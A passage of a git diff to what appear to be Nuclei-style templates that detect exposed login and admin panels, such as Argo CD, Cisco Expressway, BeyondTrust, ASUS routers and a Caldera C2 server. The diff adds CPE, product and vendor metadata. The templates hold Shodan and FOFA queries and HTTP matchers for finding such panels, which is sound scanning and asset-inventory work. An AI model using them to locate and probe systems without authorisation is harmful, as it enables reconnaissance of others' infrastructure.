4a0a0047304502210091d96867344b35c42563552bc564b4182466d6cac4abee2d338984b6e1cdd7d6022074f11714cb13bb709904658251bcccfdc4edba265448bd850d731a800f148d77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210091d96867344b35c42563552bc564b4182466d6cac4abee2d338984b6e1cdd7d6022074f11714cb13bb709904658251bcccfdc4edba265448bd850d731a800f148d77:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/aptus-panel.yaml b/http/exposed-panels/aptus-panel.yaml index 8e2616bac6..6f4f08b909 100644 --- a/http/exposed-panels/aptus-panel.yaml +++ b/http/exposed-panels/aptus-panel.yaml @@ -8,9 +8,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:intelliantech:aptus:*:*:*:*:android:*:*:* metadata: max-request: 1 shodan-query: http.title:"Aptus Login" + product: aptus + vendor: intelliantech tags: panel,aptus http: @@ -28,4 +31,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220640c761126337fc2830e60088a517d2dfb0f5f6713df24554e6b5d2a67e1820a02201dd18f81fff0bd007f61bbfa6cfeb2d714cd2769ac3e5a2e2c2ed5ca7a47d705:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220640c761126337fc2830e60088a517d2dfb0f5f6713df24554e6b5d2a67e1820a02201dd18f81fff0bd007f61bbfa6cfeb2d714cd2769ac3e5a2e2c2ed5ca7a47d705:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/argocd-login.yaml b/http/exposed-panels/argocd-login.yaml index abb3c928e6..2ed42298ff 100644 --- a/http/exposed-panels/argocd-login.yaml +++ b/http/exposed-panels/argocd-login.yaml @@ -9,9 +9,12 @@ info: - https://argoproj.github.io/cd/ classification: cwe-id: CWE-200 + cpe: cpe:2.3:a:argoproj:argo_cd:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.title:"Argo CD" + product: argo_cd + vendor: argoproj tags: panel,argocd,login,kubernetes http: @@ -40,4 +43,4 @@ http: - type: json json: - .Version -# digest: 4a0a00473045022100e4bfd42b83a19cf9d72d03fdb350a06f61f4edd94fd0cb2e322d8763ed28b49402205e8b57d8c9e543ed035d43cfd9854b21b016751f6b1d05adac2118e45199f226:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e4bfd42b83a19cf9d72d03fdb350a06f61f4edd94fd0cb2e322d8763ed28b49402205e8b57d8c9e543ed035d43cfd9854b21b016751f6b1d05adac2118e45199f226:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/aspcms-backend-panel.yaml b/http/exposed-panels/aspcms-backend-panel.yaml index 118940378d..cdcff7340f 100644 --- a/http/exposed-panels/aspcms-backend-panel.yaml +++ b/http/exposed-panels/aspcms-backend-panel.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 2 fofa-query: app="ASPCMS" + product: aspcms + vendor: asp4cms tags: panel,login,aspcms,admin + classification: + cpe: cpe:2.3:a:asp4cms:aspcms:*:*:*:*:*:*:*:* http: - raw: - | @@ -36,4 +40,4 @@ http: - 'status_code_1 == 200 && contains(body_1,"alert(")' - 'status_code_2 == 200 && contains(body_2,"var txtUserName = document.getElementById(")' condition: and -# digest: 490a004630440220234479820f4cc17b655263c9954725359c7d3dcb06092d722a81fa09cc027c2d02204e2d96c6500cad3ed9161ad8d9b391630442e9f68ac7cc0dfc0332a2c71de186:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220234479820f4cc17b655263c9954725359c7d3dcb06092d722a81fa09cc027c2d02204e2d96c6500cad3ed9161ad8d9b391630442e9f68ac7cc0dfc0332a2c71de186:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/aspect-control-panel.yaml b/http/exposed-panels/aspect-control-panel.yaml index 0310f67d1f..84ff6e775b 100644 --- a/http/exposed-panels/aspect-control-panel.yaml +++ b/http/exposed-panels/aspect-control-panel.yaml @@ -9,10 +9,13 @@ info: classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:h:abb:aspect-ent-256:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.favicon.hash:1011076161 + product: aspect-ent-256 + vendor: abb tags: panel,aspect,login http: @@ -29,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100989906bfb96b8203e8a21ebda6f2c17ac75c3684b69ea041b73595e823f908b8022032315c8eba027a1fb97942e8c402a09b9823bd48558dddc3498bd43f8e2d291f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100989906bfb96b8203e8a21ebda6f2c17ac75c3684b69ea041b73595e823f908b8022032315c8eba027a1fb97942e8c402a09b9823bd48558dddc3498bd43f8e2d291f:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/asus-router-panel.yaml b/http/exposed-panels/asus-router-panel.yaml index d5a83241f2..41417e84cd 100644 --- a/http/exposed-panels/asus-router-panel.yaml +++ b/http/exposed-panels/asus-router-panel.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:h:asus:rt-n53:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: 'Server: httpd/2.0 port:8080' + product: rt-n53 + vendor: asus tags: panel,asus,router,iot http: @@ -30,4 +33,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220013b4fa906b724cd20d2829955b7e3eeea6be850891eb1ba6b0cfdb54010dfae022072bd289e736db517ec29c4cbaeaf01ca2a2ffac82e302a49a020fade085a682f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220013b4fa906b724cd20d2829955b7e3eeea6be850891eb1ba6b0cfdb54010dfae022072bd289e736db517ec29c4cbaeaf01ca2a2ffac82e302a49a020fade085a682f:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/atlassian-bamboo-panel.yaml b/http/exposed-panels/atlassian-bamboo-panel.yaml index c6e965da43..49b1e6ec8c 100644 --- a/http/exposed-panels/atlassian-bamboo-panel.yaml +++ b/http/exposed-panels/atlassian-bamboo-panel.yaml @@ -1,5 +1,5 @@ -id: atlassian-bamboo-panel - +id: atlassian-bamboo-panel + info: name: Atlassian Bamboo Login Panel - Detect author: righettod @@ -12,33 +12,37 @@ info: verified: true max-request: 1 shodan-query: http.title:"Bamboo" + product: bamboo + vendor: atlassian tags: panel,bamboo,login,detect -http: - - method: GET - path: - - "{{BaseURL}}/userlogin!doDefault.action?os_destination=%2Fstart.action" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Log in as a Bamboo user' - - 'content="Bamboo' - - 'atlassian.bamboo.plugins' - - 'Atlassian Bamboo</a>' - condition: or - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - 'version\s+([0-9A-Za-z\s\.]+)\s+-' + classification: + cpe: cpe:2.3:a:atlassian:bamboo:*:*:*:*:*:*:*:* +http: + - method: GET + path: + - "{{BaseURL}}/userlogin!doDefault.action?os_destination=%2Fstart.action" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '<title>Log in as a Bamboo user' + - 'content="Bamboo' + - 'atlassian.bamboo.plugins' + - 'Atlassian Bamboo</a>' + condition: or + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'version\s+([0-9A-Za-z\s\.]+)\s+-' - 'pvpVersion = "([a-z0-9.]+)";' -# digest: 490a00463044022077379f6cb3ccaffdd11f65581956ef6b17ad1721484cb296df66e78d4c9948af022046cc1693337f88f3eff468bb4785c6cc8065c3633a1edf960d6310d6620862c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022077379f6cb3ccaffdd11f65581956ef6b17ad1721484cb296df66e78d4c9948af022046cc1693337f88f3eff468bb4785c6cc8065c3633a1edf960d6310d6620862c7:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/atvise-login.yaml b/http/exposed-panels/atvise-login.yaml index b453a6c9c7..3a0668742e 100644 --- a/http/exposed-panels/atvise-login.yaml +++ b/http/exposed-panels/atvise-login.yaml @@ -10,9 +10,12 @@ info: - https://www.atvise.com/en classification: cwe-id: CWE-200 + cpe: cpe:2.3:a:bachmann:atvise:*:*:*:*:*:*:*:* metadata: google-query: intitle:"atvise - next generation" max-request: 1 + product: atvise + vendor: bachmann tags: panel,atvise,edb http: @@ -30,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100837afb5096ac00840c45e91bc6c0c0b0932838628a6c226918c82da88cc05bb6022100d5ff3f90a83e3bfd685f78ed6e209c59cb907fa3367678813fb504cea7a4a33f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100837afb5096ac00840c45e91bc6c0c0b0932838628a6c226918c82da88cc05bb6022100d5ff3f90a83e3bfd685f78ed6e209c59cb907fa3367678813fb504cea7a4a33f:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/audiobookshelf-panel.yaml b/http/exposed-panels/audiobookshelf-panel.yaml index eb418a7a00..4c160d519e 100644 --- a/http/exposed-panels/audiobookshelf-panel.yaml +++ b/http/exposed-panels/audiobookshelf-panel.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 2 shodan-query: title:"Audiobookshelf" + product: audiobookshelf + vendor: audiobookshelf tags: panel,audiobookshelf,detect + classification: + cpe: cpe:2.3:a:audiobookshelf:audiobookshelf:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +38,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c1bbd8b09458d61a8f62108096d3cbd217a84079d55400f8cfbe227009e6895302210087a27dcd3c9933c40c6b3206a11877c5db9aa2c00800a9989666292af726fe7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c1bbd8b09458d61a8f62108096d3cbd217a84079d55400f8cfbe227009e6895302210087a27dcd3c9933c40c6b3206a11877c5db9aa2c00800a9989666292af726fe7b:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/audiocodes-detect.yaml b/http/exposed-panels/audiocodes-detect.yaml index 1ee85584fe..49d052c589 100644 --- a/http/exposed-panels/audiocodes-detect.yaml +++ b/http/exposed-panels/audiocodes-detect.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:o:audiocodes:420hd_ip_phone_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.html:"Audiocodes" + product: 420hd_ip_phone_firmware + vendor: audiocodes tags: panel,audiocodes http: @@ -31,4 +34,4 @@ http: - type: status status: - 203 -# digest: 490a00463044022042541274fe96259fa947539432a417d8e8b36882776d2b0a644afb5849edef2d0220206fd57bf495066dec52e5abd9eb95e650b2b5a0ab135871f087c2288e689f25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022042541274fe96259fa947539432a417d8e8b36882776d2b0a644afb5849edef2d0220206fd57bf495066dec52e5abd9eb95e650b2b5a0ab135871f087c2288e689f25:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/authelia-panel.yaml b/http/exposed-panels/authelia-panel.yaml index 196d198a47..78e4b5fe04 100644 --- a/http/exposed-panels/authelia-panel.yaml +++ b/http/exposed-panels/authelia-panel.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 1 shodan-query: title:"Login - Authelia" + product: authelia + vendor: authelia tags: login,panel,authelia + classification: + cpe: cpe:2.3:a:authelia:authelia:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +33,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022011c652c8e4ad3e46de531e029c3bcd7fe019a1f7ef8a71aa7ef87b3d039c60d4022034538df50b7e165e8d36b3bbcb858d44a935fa2bc1592669221f17de9e1f0b50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022011c652c8e4ad3e46de531e029c3bcd7fe019a1f7ef8a71aa7ef87b3d039c60d4022034538df50b7e165e8d36b3bbcb858d44a935fa2bc1592669221f17de9e1f0b50:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/axigen-webadmin.yaml b/http/exposed-panels/axigen-webadmin.yaml index e0c6618aae..d018437045 100644 --- a/http/exposed-panels/axigen-webadmin.yaml +++ b/http/exposed-panels/axigen-webadmin.yaml @@ -9,9 +9,12 @@ info: - https://www.axigen.com/ classification: cwe-id: CWE-200 + cpe: cpe:2.3:a:axigen:axigen_mail_server:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"Axigen WebAdmin" + product: axigen_mail_server + vendor: axigen tags: axigen,panel http: diff --git a/http/exposed-panels/axigen-webmail.yaml b/http/exposed-panels/axigen-webmail.yaml index 3707673eb8..eee9466eb4 100644 --- a/http/exposed-panels/axigen-webmail.yaml +++ b/http/exposed-panels/axigen-webmail.yaml @@ -9,9 +9,12 @@ info: - https://www.axigen.com/ classification: cwe-id: CWE-200 + cpe: cpe:2.3:a:axigen:axigen_mail_server:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"Axigen WebMail" + product: axigen_mail_server + vendor: axigen tags: axigen,panel http: diff --git a/http/exposed-panels/azkaban-web-client.yaml b/http/exposed-panels/azkaban-web-client.yaml index 87a5f4941f..2ce075d00a 100644 --- a/http/exposed-panels/azkaban-web-client.yaml +++ b/http/exposed-panels/azkaban-web-client.yaml @@ -9,9 +9,12 @@ info: - https://azkaban.github.io/ classification: cwe-id: CWE-200 + cpe: cpe:2.3:a:azkaban_project:azkaban:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"Azkaban Web Client" + product: azkaban + vendor: azkaban_project tags: panel,azkaban http: diff --git a/http/exposed-panels/backpack/backpack-admin-panel.yaml b/http/exposed-panels/backpack/backpack-admin-panel.yaml index 8609b2c8ea..b97cefab0a 100644 --- a/http/exposed-panels/backpack/backpack-admin-panel.yaml +++ b/http/exposed-panels/backpack/backpack-admin-panel.yaml @@ -9,10 +9,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:backpackforlaravel:backpack\\\\crud:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"Backpack Admin" verified: true + product: backpack\\\\crud + vendor: backpackforlaravel tags: panel,backpack,admin http: @@ -27,4 +30,4 @@ http: - 'Backpack Admin' - 'backpack_alerts' condition: or -# digest: 4b0a00483046022100d3e64e2b982ee20697422c01bc6650eea924437cab9709055ce602b9130c72ef022100c8b853b48c80f432d0ca00cad02b507aff47df49a8f0fa6e6db61c89df420342:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d3e64e2b982ee20697422c01bc6650eea924437cab9709055ce602b9130c72ef022100c8b853b48c80f432d0ca00cad02b507aff47df49a8f0fa6e6db61c89df420342:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/beyondtrust-panel.yaml b/http/exposed-panels/beyondtrust-panel.yaml index 8d7bb47905..4a2972ab68 100644 --- a/http/exposed-panels/beyondtrust-panel.yaml +++ b/http/exposed-panels/beyondtrust-panel.yaml @@ -8,9 +8,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:beyondtrust:beyondinsight:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.html:"BeyondInsight" + product: beyondinsight + vendor: beyondtrust tags: beyondtrust,pam,panel http: @@ -23,4 +26,4 @@ http: part: body words: - "<title>BeyondInsight" -# digest: 4b0a00483046022100a7cc58d74372d8883f9dd19d8d74b2aef820ebfb585fc8c82b99446ea55fd61802210087b70c208e06248133c219d0b73cd243cf091b88e8db971b50f5a4cd26cfa30d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a7cc58d74372d8883f9dd19d8d74b2aef820ebfb585fc8c82b99446ea55fd61802210087b70c208e06248133c219d0b73cd243cf091b88e8db971b50f5a4cd26cfa30d:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/beyondtrust-priv-panel.yaml b/http/exposed-panels/beyondtrust-priv-panel.yaml index 72817e382e..dffcf04241 100644 --- a/http/exposed-panels/beyondtrust-priv-panel.yaml +++ b/http/exposed-panels/beyondtrust-priv-panel.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 2 shodan-query: "http.html:\"BeyondTrust Privileged Remote Access Login\"" + product: privileged_remote_access + vendor: beyondtrust tags: panel,beyondtrust,login,detect + classification: + cpe: cpe:2.3:a:beyondtrust:privileged_remote_access:*:*:*:*:*:*:*:* http: - method: GET path: @@ -28,4 +32,4 @@ http: - 'status_code == 200' - 'contains_any(to_lower(body), "beyondtrust privileged remote access login", "privileged-remote-access") && contains(to_lower(body), "login")' condition: and -# digest: 490a00463044022028b4e01a5b67ca4c729f2f8622b5c4d5f37790ab986c7391d5d051b04c4f6f68022050105cc6f641dcc0a83e084ff5079d19f2afc6602415776f329ed7cb90fb8192:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022028b4e01a5b67ca4c729f2f8622b5c4d5f37790ab986c7391d5d051b04c4f6f68022050105cc6f641dcc0a83e084ff5079d19f2afc6602415776f329ed7cb90fb8192:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/bigfix-login.yaml b/http/exposed-panels/bigfix-login.yaml index deac005e3a..91044e5a3f 100644 --- a/http/exposed-panels/bigfix-login.yaml +++ b/http/exposed-panels/bigfix-login.yaml @@ -10,10 +10,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:hcltech:bigfix_mobile:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"BigFix" google-query: intitle:"BigFix" + product: bigfix_mobile + vendor: hcltech tags: panel,bigfix http: @@ -33,4 +36,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022065f6a33038d7d84d83a99da20a8c681b5da9d4f21841808f9d2cb8693b4d42c50220532723384c6d829d2292ae0c5bbcc40c8eee10f9e8dab56e2f2ddb6546d99d59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022065f6a33038d7d84d83a99da20a8c681b5da9d4f21841808f9d2cb8693b4d42c50220532723384c6d829d2292ae0c5bbcc40c8eee10f9e8dab56e2f2ddb6546d99d59:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/biotime-panel.yaml b/http/exposed-panels/biotime-panel.yaml index d6622230c6..996f0cb0a5 100644 --- a/http/exposed-panels/biotime-panel.yaml +++ b/http/exposed-panels/biotime-panel.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:zkteco:biotime:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: http.title:"BioTime" + product: biotime + vendor: zkteco tags: panel,biotime http: @@ -34,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fa05c8a043bd0b0ba9aea94f73ad920f9c5f2325d35d876ce630f261049eb37f02207ff889721c8e76f7cf811f925ca59a9d9c5a1ade618acdc23a265c500fca8869:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fa05c8a043bd0b0ba9aea94f73ad920f9c5f2325d35d876ce630f261049eb37f02207ff889721c8e76f7cf811f925ca59a9d9c5a1ade618acdc23a265c500fca8869:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/black-duck-panel.yaml b/http/exposed-panels/black-duck-panel.yaml index bbf4a6f9c6..cde9bc2636 100644 --- a/http/exposed-panels/black-duck-panel.yaml +++ b/http/exposed-panels/black-duck-panel.yaml @@ -12,10 +12,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:synopsys:black_duck_hub:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.title:"Black Duck" + product: black_duck_hub + vendor: synopsys tags: panel,blackduck,synopsys http: @@ -43,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022013e7b2bc1c0eb0af3800a1d928e90ed78efa8858a004a6f32e7f8bd91c1ae2ab022006e6f835652fc9f9fcf7aef711c8536d23389c7b12e1ac575dc7643cdf37dcf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022013e7b2bc1c0eb0af3800a1d928e90ed78efa8858a004a6f32e7f8bd91c1ae2ab022006e6f835652fc9f9fcf7aef711c8536d23389c7b12e1ac575dc7643cdf37dcf7:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/bonobo-server-panel.yaml b/http/exposed-panels/bonobo-server-panel.yaml index fa831f9181..6a65031aa9 100644 --- a/http/exposed-panels/bonobo-server-panel.yaml +++ b/http/exposed-panels/bonobo-server-panel.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 2 shodan-query: http.favicon.hash:-219625874 + product: bonobo_git_server + vendor: bonobogitserver tags: panel,bonobo,git,login,detect + classification: + cpe: cpe:2.3:a:bonobogitserver:bonobo_git_server:*:*:*:*:*:*:*:* http: - method: GET path: @@ -38,4 +42,4 @@ http: group: 1 regex: - '(?i)bonobo git server \((.*)\)' -# digest: 4a0a00473045022018f4fb6f144e0c0797a0dbd56483a50d32639f079141a0ff0928451deb1f45600221008ee83aa47cad2848439cf9632a05c14c34ba0bb36afd80a31809ce7cbb5f638f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022018f4fb6f144e0c0797a0dbd56483a50d32639f079141a0ff0928451deb1f45600221008ee83aa47cad2848439cf9632a05c14c34ba0bb36afd80a31809ce7cbb5f638f:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/busybox-repository-browser.yaml b/http/exposed-panels/busybox-repository-browser.yaml index c01ce2e9dd..6a39dad0f2 100644 --- a/http/exposed-panels/busybox-repository-browser.yaml +++ b/http/exposed-panels/busybox-repository-browser.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 fofa-query: title="Busybox Repository Browser" + product: busybox + vendor: busybox tags: detect,busybox,oss,panel + classification: + cpe: cpe:2.3:a:busybox:busybox:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d6a1f10acac0f712eb8ee9719f6f081cc8e937cb4f32885c4dc5f71a78282cd2022100cb07961a60db5dfb12cd6497f3e120d56f7d3646c283ebde7f883d4b9efe9b0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d6a1f10acac0f712eb8ee9719f6f081cc8e937cb4f32885c4dc5f71a78282cd2022100cb07961a60db5dfb12cd6497f3e120d56f7d3646c283ebde7f883d4b9efe9b0f:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/c2/caldera-c2.yaml b/http/exposed-panels/c2/caldera-c2.yaml index 9acf0e641e..62b2500796 100644 --- a/http/exposed-panels/c2/caldera-c2.yaml +++ b/http/exposed-panels/c2/caldera-c2.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 1 fofa-query: http.favicon.hash:-636718605 + product: caldera + vendor: mitre tags: c2,ir,osint,caldera,panel + classification: + cpe: cpe:2.3:a:mitre:caldera:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +34,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202ed3136e5c5f63eab633746afb7d795c109d100fadcb51118322c2daf931a791022100a444d8fffaa58aa50a471e4dd3568c359d6f3dbcfa5ac74879ca34b2fbc6c71b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202ed3136e5c5f63eab633746afb7d795c109d100fadcb51118322c2daf931a791022100a444d8fffaa58aa50a471e4dd3568c359d6f3dbcfa5ac74879ca34b2fbc6c71b:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/casaos-panel.yaml b/http/exposed-panels/casaos-panel.yaml index 692ddac51e..80fb4c334c 100644 --- a/http/exposed-panels/casaos-panel.yaml +++ b/http/exposed-panels/casaos-panel.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:o:icewhale:casaos:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: html:"CasaOS" + product: casaos + vendor: icewhale tags: panel,casaos,login,detect http: @@ -35,4 +38,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200f0cf4e8c38e949e072718beb3416c8dd350c8175d045a024c8971e7c74141ab022038106666f0eb4962180327b98faa88b99b8128192108ec41d7ac86b5a62a34d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200f0cf4e8c38e949e072718beb3416c8dd350c8175d045a024c8971e7c74141ab022038106666f0eb4962180327b98faa88b99b8128192108ec41d7ac86b5a62a34d7:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/changedetection-panel.yaml b/http/exposed-panels/changedetection-panel.yaml index 7d1b8be579..e254f7c93c 100644 --- a/http/exposed-panels/changedetection-panel.yaml +++ b/http/exposed-panels/changedetection-panel.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 1 shodan-query: title:"Change Detection" + product: changedetection + vendor: changedetection tags: panel,changedetection,detect + classification: + cpe: cpe:2.3:a:changedetection:changedetection:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022022e53442307a1e84c8810107836f92c32453b7e1dbf76dfd97e12b81e0ddb11802200302042400b7c214b214e9ca43f63f77d759b19bf20c244b1b9d6fc5f684db95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022022e53442307a1e84c8810107836f92c32453b7e1dbf76dfd97e12b81e0ddb11802200302042400b7c214b214e9ca43f63f77d759b19bf20c244b1b9d6fc5f684db95:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/cisco-unity-panel.yaml b/http/exposed-panels/cisco-unity-panel.yaml index e56bc08180..1a6723ed46 100644 --- a/http/exposed-panels/cisco-unity-panel.yaml +++ b/http/exposed-panels/cisco-unity-panel.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 2 shodan-query: html:"Cisco Unity Connection" + product: unity_connection + vendor: cisco tags: panel,cisco,unity,login,detect + classification: + cpe: cpe:2.3:a:cisco:unity_connection:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +38,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200a80c7d68cfe1ae0075603046be2f5dd175796cb6b9bf4daa92aa80b7981219c022100e47b1b5107b34e7e9aac0afb13a9f878da371df77f19c24fc83ac7ae87da03b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200a80c7d68cfe1ae0075603046be2f5dd175796cb6b9bf4daa92aa80b7981219c022100e47b1b5107b34e7e9aac0afb13a9f878da371df77f19c24fc83ac7ae87da03b9:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/cisco/cisco-ace-device-manager.yaml b/http/exposed-panels/cisco/cisco-ace-device-manager.yaml index bc201c73fb..c7e4555416 100644 --- a/http/exposed-panels/cisco/cisco-ace-device-manager.yaml +++ b/http/exposed-panels/cisco/cisco-ace-device-manager.yaml @@ -8,9 +8,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:h:cisco:ace_4710_application_control_engine:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: html:"ACE 4710 Device Manager" + product: ace_4710_application_control_engine + vendor: cisco tags: panel,cisco http: @@ -28,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b5c48cd7459dda537c75bb4bd6b43feacf17ec18f76b6391d48b51a4b09a2eed02201b20290d8842ee5de307ca797ce1a09e24cc577b89ef755ff83f5e9e8895195a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b5c48cd7459dda537c75bb4bd6b43feacf17ec18f76b6391d48b51a4b09a2eed02201b20290d8842ee5de307ca797ce1a09e24cc577b89ef755ff83f5e9e8895195a:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/cisco/cisco-expressway-panel.yaml b/http/exposed-panels/cisco/cisco-expressway-panel.yaml index 71f6acad9c..511d492c89 100644 --- a/http/exposed-panels/cisco/cisco-expressway-panel.yaml +++ b/http/exposed-panels/cisco/cisco-expressway-panel.yaml @@ -1,5 +1,5 @@ -id: cisco-expressway-panel - +id: cisco-expressway-panel + info: name: CISCO Expressway Login Panel - Detect author: righettod @@ -12,24 +12,28 @@ info: verified: true max-request: 1 shodan-query: html:"Cisco Expressway" + product: expressway_software + vendor: cisco tags: panel,cisco,login,detect -http: - - method: GET - path: - - "{{BaseURL}}/login" - - matchers: - - 